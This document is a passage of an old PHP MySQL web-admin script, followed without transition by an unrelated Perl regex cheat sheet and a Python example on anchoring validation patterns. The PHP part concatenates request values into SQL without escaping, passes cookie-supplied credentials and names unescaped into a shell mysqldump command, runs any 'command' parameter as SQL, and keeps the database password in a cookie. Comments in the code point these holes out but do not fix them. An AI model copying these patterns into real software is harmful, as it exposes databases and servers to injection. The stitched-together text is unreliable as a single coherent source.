$key .= "&" . $field->name . "=" . $data;

if( strlen( $data ) > 20 )
$data = substr( $data, 0, 20 ) . "...";
$data = htmlspecialchars( $data );
echo "<td>\n";
echo "$data\n";
echo "</td>\n";
}

if( $key == "" )
echo "<td colspan=2>no Key</td>\n";
else {
echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
}
echo "</tr>\n";
}
echo "</table>\n";

echo "<font size=2>\n";
echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
echo "<font color=green>\n";
echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
echo "</font>\n";
echo " | ";
if( $page > 0 ) {
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
if( $orderby != "" )
echo "&orderby=$orderby";
echo "'>Prev</a>\n";
} else
echo "Prev";
echo " | ";
if( $page < ($row/$rowperpage)-1 ) {
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
if( $orderby != "" )
echo "&orderby=$orderby";
echo "'>Next</a>\n";
} else
echo "Next";
echo " | ";
if( $row > $rowperpage ) {
echo "<input type=text size=4 name=page>\n";
echo "<input type=submit value='Go'>\n";
}
echo "</form>\n";
echo "</font>\n";
}

function manageData( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Data</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Data</h1>\n";
        $pResult = mysql_list_fields( $dbname, $tablename );
        $num = mysql_num_fields( $pResult );

        // Build the WHERE clause from the primary-key columns. The values are
        // request-supplied (read via $GLOBALS) and concatenated without escaping.
        $key = "";
        for( $i = 0; $i < $num; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            if( $field->primary_key == 1 )
                if( $field->numeric == 1 )
                    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
                else
                    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
        }
        $key = substr( $key, 0, strlen($key)-4 );

        mysql_select_db( $dbname, $mysqlHandle );
        $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
        $data = mysql_fetch_array( $pResult );
    }

    echo "<p class=location>$dbname &gt; $tablename</p>\n";

    echo "<form action='$PHP_SELF' method=post>\n";
    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addData_submit>\n";
    else if( $cmd == "edit" )
        echo "<input type=hidden name=action value=editData_submit>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";
    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    echo "<th>Name</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Function</th>\n";
    echo "<th>Data</th>\n";
    echo "</tr>\n";

    $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
    $num = mysql_num_rows( $pResult );

    $pResultLen = mysql_list_fields( $dbname, $tablename );

    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_array( $pResult );
        $fieldname = $field["Field"];
        $fieldtype = $field["Type"];
        $len = mysql_field_len( $pResultLen, $i );

        echo "<tr>";
        echo "<td>$fieldname</td>";
        echo "<td>".$field["Type"]."</td>";
        echo "<td>\n";
        echo "<select name=${fieldname}_function>\n";
        echo "<option>\n";
        echo "<option>ASCII\n";
        echo "<option>CHAR\n";
        echo "<option>SOUNDEX\n";
        echo "<option>CURDATE\n";
        echo "<option>CURTIME\n";
        echo "<option>FROM_DAYS\n";
        echo "<option>FROM_UNIXTIME\n";
        echo "<option>NOW\n";
        echo "<option>PASSWORD\n";
        echo "<option>PERIOD_ADD\n";
        echo "<option>PERIOD_DIFF\n";
        echo "<option>TO_DAYS\n";
        echo "<option>USER\n";
        echo "<option>WEEKDAY\n";
        echo "<option>RAND\n";
        echo "</select>\n";
        echo "</td>\n";
        $value = htmlspecialchars($data[$i]);
        if( $cmd == "add" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                echo strtok( "'" );
                while( $str = strtok( "'" ) ) {
                    echo "<option>$str\n";
                    strtok( "'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
            }
        } else if( $cmd == "edit" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                echo strtok( "'" );
                while( $str = strtok( "'" ) ) {
                    if( $value == $str )
                        echo "<option selected>$str\n";
                    else
                        echo "<option>$str\n";
                    strtok( "'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
            }
        }
        echo "</tr>";
    }
    echo "</table><p>\n";
    if( $cmd == "add" )
        echo "<input type=submit value='Add Data'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Data'>\n";
    echo "<input type=button value='Cancel' onClick='history.back()'>\n";
    echo "</form>\n";
}

function manageData_submit( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    mysql_select_db( $dbname, $mysqlHandle );
    if( $cmd == "add" )
        $queryStr = "INSERT INTO $tablename VALUES (";
    else if( $cmd == "edit" )
        $queryStr = "REPLACE INTO $tablename VALUES (";
    // Each column value and its optional "<column>_function" wrapper are
    // request-supplied and concatenated into the statement without escaping.
    for( $i = 0; $i < $num-1; $i++ ) {
        $field = mysql_fetch_field( $pResult );
        $func = $GLOBALS[$field->name."_function"];
        if( $func != "" )
            $queryStr .= " $func(";
        if( $field->numeric == 1 ) {
            $queryStr .= $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "),";
            else
                $queryStr .= ",";
        } else {
            $queryStr .= "'" . $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "'),";
            else
                $queryStr .= "',";
        }
    }
    // The last column is handled separately so the list closes with ")".
    $field = mysql_fetch_field( $pResult );
    if( $field->numeric == 1 )
        $queryStr .= $GLOBALS[$field->name] . ")";
    else
        $queryStr .= "'" . $GLOBALS[$field->name] . "')";

    mysql_query( $queryStr , $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );
}

function deleteData() {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    // Same unescaped primary-key WHERE clause as in manageData().
    $key = "";
    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_field( $pResult, $i );
        if( $field->primary_key == 1 )
            if( $field->numeric == 1 )
                $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
            else
                $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
    }
    $key = substr( $key, 0, strlen($key)-4 );

    mysql_select_db( $dbname, $mysqlHandle );
    $queryStr = "DELETE FROM $tablename WHERE $key";
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );
}

function dump() {
    global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;

    if( $action == "dumpTable" )
        $filename = $tablename;
    else
        $filename = $dbname;

    header("Content-disposition: filename=$filename.sql");
    header("Content-type: application/octetstream");
    header("Pragma: no-cache");
    header("Expires: 0");

    // Locate the MySQL installation directory to find the mysqldump binary.
    $pResult = mysql_query( "show variables" );
    while( 1 ) {
        $rowArray = mysql_fetch_row( $pResult );
        if( $rowArray == false ) break;
        if( $rowArray[0] == "basedir" )
            $bindir = $rowArray[1]."bin/";
    }

    // $USERNAME and $PASSWORD are taken from cookies (see MAIN); they, $dbname
    // and $tablename reach the shell command line unescaped.
    passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
}

function utils() {
    global $PHP_SELF, $command;
    echo "<h1>Utilities</h1>\n";
    if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
        echo "<hr>\n";
        echo "Show\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
        echo "</ul>\n";
        echo "Flush\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
        if( $command == "flush_hosts" ) {
            if( mysql_query( "Flush hosts" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
        if( $command == "flush_logs" ) {
            if( mysql_query( "Flush logs" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
        if( $command == "flush_privileges" ) {
            if( mysql_query( "Flush privileges" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
        if( $command == "flush_tables" ) {
            if( mysql_query( "Flush tables" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
        if( $command == "flush_status" ) {
            if( mysql_query( "Flush status" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "</ul>\n";
    } else {
        // Any other $command value is run as SQL once "_" is replaced by a space.
        $queryStr = ereg_replace( "_", " ", $command );
        $pResult = mysql_query( $queryStr );
        if( $pResult == false ) {
            echo "Fail";
            return;
        }
        $col = mysql_num_fields( $pResult );

        echo "<p class=location>$queryStr</p>\n";
        echo "<hr>\n";

        echo "<table cellspacing=1 cellpadding=2 border=0>\n";
        echo "<tr>\n";
        for( $i = 0; $i < $col; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            echo "<th>".$field->name."</th>\n";
        }
        echo "</tr>\n";

        while( 1 ) {
            $rowArray = mysql_fetch_row( $pResult );
            if( $rowArray == false ) break;
            echo "<tr>\n";
            for( $j = 0; $j < $col; $j++ )
                echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
            echo "</tr>\n";
        }
        echo "</table>\n";
    }
}

function header_html() {
global $PHP_SELF;

?>
<html>
<head>
<title>MySQL Web Interface</title>
<style type="text/css">
<!--
p.location {
color: #11bb33;
font-size: small;
}
h1 {
color: #A4A260;
}
th {
background-color: #BDBE42;
color: #FFFFFF;
font-size: x-small;
}
td {
background-color: #DEDFA5;
font-size: x-small;
}
form {
margin-top: 0;
margin-bottom: 0;
}
a {
text-decoration:none;
color: #848200;
font-size:x-small;
}
a:link {
}
a:hover {
background-color:#EEEFD5;
color:#646200;
text-decoration:none
}
//-->
</style>
</head>
<body>
<?
}

function footer_html() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;

    echo "<hr>\n";
    echo "<font size=2>\n";
    echo "<font color=blue>[$USERNAME]</font> - \n";

    echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
    if( $tablename != "" )
        echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
    echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
    echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
    echo "</font>\n";
    echo "</body>\n";
    echo "</html>\n";
}

//------------------------------------------------------ MAIN

if( $action == "logon" || $action == "" || $action == "logout" )
    logon();
else if( $action == "logon_submit" )
    logon_submit();
else if( $action == "dumpTable" || $action == "dumpDB" ) {
    // The database username and password are read back from cookies on every request.
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
    }
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
    dump();
} else {
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
    }
    // Any connection warning is emitted inside an HTML comment.
    echo "<!--";
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
    echo "-->";

    if( $mysqlHandle == false ) {
        echo "<html>\n";
        echo "<head>\n";
        echo "<title>MySQL Web Interface</title>\n";
        echo "</head>\n";
        echo "<body>\n";
        echo "<table width=100% height=100%><tr><td><center>\n";
        echo "<h1>Wrong Password!</h1>\n";
        echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
        echo "</center></td></tr></table>\n";
        echo "</body>\n";
        echo "</html>\n";
    } else {
        header_html();
        if( $action == "listDBs" )
            listDatabases();
        else if( $action == "createDB" )
            createDatabase();
        else if( $action == "dropDB" )
            dropDatabase();
        else if( $action == "listTables" )
            listTables();
        else if( $action == "createTable" )
            createTable();
        else if( $action == "dropTable" )
            dropTable();
        else if( $action == "viewSchema" )
            viewSchema();
        else if( $action == "query" )
            viewData( $queryStr );
        else if( $action == "addField" )
            manageField( "add" );
        else if( $action == "addField_submit" )
            manageField_submit( "add" );
        else if( $action == "editField" )
            manageField( "edit" );
        else if( $action == "editField_submit" )
            manageField_submit( "edit" );
        else if( $action == "dropField" )
            dropField();
        else if( $action == "viewData" )
            viewData( "" );
        else if( $action == "addData" )
            manageData( "add" );
        else if( $action == "addData_submit" )
            manageData_submit( "add" );
        else if( $action == "editData" )
            manageData( "edit" );
        else if( $action == "editData_submit" )
            manageData_submit( "edit" );
        else if( $action == "deleteData" )
            deleteData();
        else if( $action == "utils" )
            utils();

        mysql_close( $mysqlHandle);
        footer_html();
    }
}

?>


PERL Regular Expression REGEX Cheat Sheet Examples

Metacharacter             Description

.             Matches any single character (many applications exclude newlines, and exactly which characters are considered newlines is flavor-, character-encoding-, and platform-specific, but it is safe to assume that the line feed character is included). Within POSIX bracket expressions, the dot character matches a literal dot. For example, a.c matches “abc”, etc., but [a.c] matches only “a”, “.”, or “c”.

[ ]             A bracket expression. Matches a single character that is contained within the brackets. For example, [abc] matches “a”, “b”, or “c”. [a-z] specifies a range which matches any lowercase letter from “a” to “z”. These forms can be mixed: [abcx-z] matches “a”, “b”, “c”, “x”, “y”, or “z”, as does [a-cx-z]. The - character is treated as a literal character if it is the last or the first (after the ^) character within the brackets: [abc-], [-abc]. Note that backslash escapes are not allowed. The ] character can be included in a bracket expression if it is the first (after the ^) character: []abc].

[^ ]             Matches a single character that is not contained within the brackets. For example, [^abc] matches any character other than “a”, “b”, or “c”. [^a-z] matches any single character that is not a lowercase letter from “a” to “z”. Likewise, literal characters and ranges can be mixed.

^             Matches the starting position within the string. In line-based tools, it matches the starting position of any line.

$             Matches the ending position of the string or the position just before a string-ending newline. In line-based tools, it matches the ending position of any line.

BRE: \( \)   ERE: ( )             Defines a marked subexpression. The string matched within the parentheses can be recalled later (see the next entry, \n). A marked subexpression is also called a block or capturing group.

\n             Matches what the nth marked subexpression matched, where n is a digit from 1 to 9. This construct is theoretically irregular and was not adopted in the POSIX ERE syntax. Some tools allow referencing more than nine capturing groups.

*             Matches the preceding element zero or more times. For example, ab*c matches “ac”, “abc”, “abbbc”, etc. [xyz]* matches “”, “x”, “y”, “z”, “zx”, “zyx”, “xyzzy”, and so on. (ab)* matches “”, “ab”, “abab”, “ababab”, and so on.

BRE: \{m,n\}   ERE: {m,n}             Matches the preceding element at least m and not more than n times. For example, a{3,5} matches only “aaa”, “aaaa”, and “aaaaa”. This is not found in a few older instances of regular expressions.

Examples:

  • .at matches any three-character string ending with “at”, including “hat”, “cat”, and “bat”.
  • [hc]at matches “hat” and “cat”.
  • [^b]at matches all strings matched by .at except “bat”.
  • [^hc]at matches all strings matched by .at other than “hat” and “cat”.
  • ^[hc]at matches “hat” and “cat”, but only at the beginning of the string or line.
  • [hc]at$ matches “hat” and “cat”, but only at the end of the string or line.
  • \[.\] matches any single character surrounded by “[” and “]” since the brackets are escaped, for example: “[a]” and “[b]”.

 

In ERE syntax, for example, \( \) is now ( ) and \{ \} is now { }.

 

A vertical bar separates alternatives. For example, gray|grey can match “gray” or “grey”.

 

gray|grey and gr(a|e)y are equivalent patterns which both describe the set of “gray” or “grey”.

 

?             The question mark indicates there is zero or one of the preceding element. For example, colou?r matches both “color” and “colour”.

*             The asterisk indicates there is zero or more of the preceding element. For example, ab*c matches “ac”, “abc”, “abbc”, “abbbc”, and so on.

+             The plus sign indicates there is one or more of the preceding element. For example, ab+c matches “abc”, “abbc”, “abbbc”, and so on, but not “ac”.
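The anchor and alternation rules above matter most when a pattern is used to validate input. The following is an added example, not part of the original cheat sheet, written in Python because its re module follows the Perl behaviour described for ^ and $; the sample inputs, the pattern names and the use of \A and \Z are assumptions introduced here.

```python
import re

# Constructed inputs for a field that must be 3 to 32 lowercase letters.
SAMPLES = ["backup", "backup\n", "backup; id", "ab", "x" * 33, "Backup"]

UNANCHORED = re.compile(r"[a-z]{3,32}")    # matches any qualifying substring
ANCHORED = re.compile(r"^[a-z]{3,32}$")    # $ also matches before a final "\n"
STRICT = re.compile(r"\A[a-z]{3,32}\Z")    # Python's \Z: true end of string only
                                           # (Perl spells this \z)

# Alternation binds more loosely than the anchors written around it.
ALT_SPLIT = re.compile(r"^gray|grey$")     # "starts with gray" OR "ends with grey"
ALT_GROUPED = re.compile(r"\Agr(a|e)y\Z")  # exactly "gray" or "grey"


def accepts(pattern, value):
    """True if a validator built on this pattern would let the value through."""
    return pattern.search(value) is not None


def compare(samples=SAMPLES):
    """Map each sample to its (unanchored, anchored, strict) verdicts."""
    return {s: (accepts(UNANCHORED, s), accepts(ANCHORED, s), accepts(STRICT, s))
            for s in samples}


if __name__ == "__main__":
    for sample, verdicts in compare().items():
        print(f"{sample!r:40} {verdicts}")
    for word in ["gray", "grayscale", "not grey", "grey\n"]:
        print(f"{word!r:40} {accepts(ALT_SPLIT, word)} {accepts(ALT_GROUPED, word)}")
```

Only the strict forms reject the value with a trailing newline and the values that merely contain or begin with an allowed string.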

 
